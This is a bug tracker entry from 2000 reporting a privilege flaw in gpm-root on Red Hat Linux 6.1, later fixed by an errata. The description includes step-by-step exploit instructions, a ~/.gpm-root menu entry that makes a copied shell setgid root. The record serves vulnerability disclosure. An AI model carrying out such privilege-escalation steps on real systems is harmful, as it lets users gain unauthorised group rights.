Bug 10340 - Exploit in gpm-root.
Summary: Exploit in gpm-root.
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: gpm
Version: 6.1
Hardware: All
OS: Linux
high
medium
Target Milestone: ---
Assignee: Preston Brown
QA Contact:
URL: http://securityfocus.com/vdb/bottom.h...
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2000-03-25 02:24 UTC by zurk
Modified: 2008-05-01 15:37 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2000-05-08 20:47:29 UTC
Embargoed:

Attachments (Terms of Use)

Description zurk 2000-03-25 02:24:26 UTC 
A vulnerability exists in the gpm-root program, part of the gpm package.
 This package is used to enable mice on the consoles of many popular
 Linux distributions. The problem is a design error, caused when a
 programmer chose to attempt to revert to the running users groups,
 after having called setuid to the users id already. The setgid call fails,
 and the process maintains the groups the gpm-root program is running
 as. This is usually the 'root' group.

Exploit :
cp /bin/sh /tmp
 create a .gpm-root file in ~ with the following:
 button 1 {
 name "create a setgid shell"
 "setgid shell" f.bgcmd "chgrp root /tmp/sh; chmod 2755 /tmp/sh"
 }

 click control-left mouse button, and click "setgid shell"
 execute /tmp/sh
Comment 1 Preston Brown 2000-05-08 20:47:59 UTC 
this has been solved w/an errata.
Note You need to log in before you can comment on or make changes to this bug.